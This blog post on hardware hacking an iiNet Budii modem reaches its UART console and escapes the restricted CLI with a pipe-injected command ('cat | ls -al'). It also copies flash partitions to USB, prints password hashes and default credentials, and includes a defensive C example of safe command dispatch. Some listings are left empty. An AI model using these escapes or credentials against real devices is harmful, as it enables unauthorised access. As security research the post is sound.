Tuesday, 16 May 2017

iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find an internal USB port; we can also see an Altera MAX JTAG breakout, a large set of GPIO pins and a UART breakout.

Connecting to the UART and booting, we can see the modem is running a Broadcom firmware:

CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel

The user names available to us are:

Upon logging in we are brought into a console(d). The commands available to admin are:

help           logout      exit       quit     reboot       adsl       
xdslctl           xtm      brctl      cat     loglevel       logdest
virtualserver  ddns      df    dumpcfg   dumpmdm   meminfo
psp   kill    dnsproxy    syslog    echo  ifconfig   ping
ps    pwd        sntp     sysinfo      tftp   voice
wlctl wifidefault arp defaultgateway  dhcpserver  dns
endbg dac3120_dbg cpld_led  lan  lanhosts   passwd  ppp
restoredefault  route save  swversion  cfgupdate  swupdate
exitOnIdle  wan  7sl  factoryrestore  factorywifi sysreport
 audiotest   usbinfo  zigbeetest  stopzigbee  initzigbee

The user account is slightly less privileged than the admin.

A quick cat of /etc/passwd or /var/passwd gives us:

support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh

The passwords are all username=password, except for iinetbob (password unknown).

OK, so bob's password is supposed to be super long and I don't have it, so I need more access to see the file system.

We use a pipe (|) on cat or ping; really anything will work at this point, it is just that cat is cleaner.

So we use:

>cat | ls -al

Because the second command is not bound to console(d), we can use the whole
BusyBox/sh/ash command set, but after the command we are returned to the console(d).
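Why the pipe escapes the console, and what a restricted CLI has to do instead, as an added C example (not the Budii firmware's or libcms_cli's own code; the function names are hypothetical):

```c
/* Added example: a restricted CLI that hands user text to /bin/sh versus
 * one that execs the allowed binary directly with an argv. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ARGS 8

/* Vulnerable pattern: the console concatenates the user's text into one
 * line and passes it to the shell, so everything after '|' is run by
 * /bin/sh outside whatever the console meant to allow. */
int vulnerable_dispatch(const char *cmd, const char *user_text) {
    char line[256];
    snprintf(line, sizeof line, "%s %s", cmd, user_text);
    return system(line);            /* e.g. sh -c "cat | ls -al" */
}

/* Hardened: accept only a conservative character set per token. */
int safe_token(const char *t) {
    for (; *t; t++)
        if (!isalnum((unsigned char)*t) && !strchr("/._-", *t))
            return 0;
    return 1;
}

/* Split the user's text into an argv; returns argc, or -1 on rejection. */
int build_argv(const char *cmd, const char *user_text,
               char *argv[], char *buf, size_t buflen) {
    int argc = 0;
    argv[argc++] = (char *)cmd;
    snprintf(buf, buflen, "%s", user_text);
    for (char *tok = strtok(buf, " \t"); tok; tok = strtok(NULL, " \t")) {
        if (argc >= MAX_ARGS - 1 || !safe_token(tok))
            return -1;              /* '|', ';', '$', '>' never reach a shell */
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return argc;
}

/* Exec the fixed command with the validated argv; no shell is involved. */
int hardened_dispatch(const char *cmd, const char *user_text) {
    char buf[256], *argv[MAX_ARGS];
    if (build_argv(cmd, user_text, argv, buf, sizeof buf) < 0)
        return -1;
    pid_t pid = fork();
    if (pid == 0) { execvp(cmd, argv); _exit(127); }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```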

By inserting a USB stick into the internal port we can simply cp out the files we need (cp takes the destination directory as its last argument rather than a redirect):

>cat | cp /dev/mtd0 /dev/mtd1 /dev/mtd2 /dev/mtd3 (your drive)

Looking into the console(d) routines and their links into libcms_cli,
we find a table of hidden commands (cliHiddenCmdTable),
one of them more interesting than the others:

# DATA XREF: .data:cliHiddenCmdTable o


This command breaks out of console(d) without killing the supervisors (smd & ssk).
We can always use the cat trick to break into sh, but that sometimes fouls the smd control.

The command can be used from both the user account and the admin account, so in theory, if the router's admin account were locked, we could use the user account plus the privesc commands to gain high-level access.

We are still very limited as to how far we can swing inside the commands, as smd and ssk respond to a lot of the actions placed across the userland (telnet & ssh).

The config files can be dumped via >dumpmdm or dumpconfig,

which will also dump the users and passwords with no encoding or hashing:

<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>
<X_BROADCOM_COM_LoginCfg>

Till Next Time.
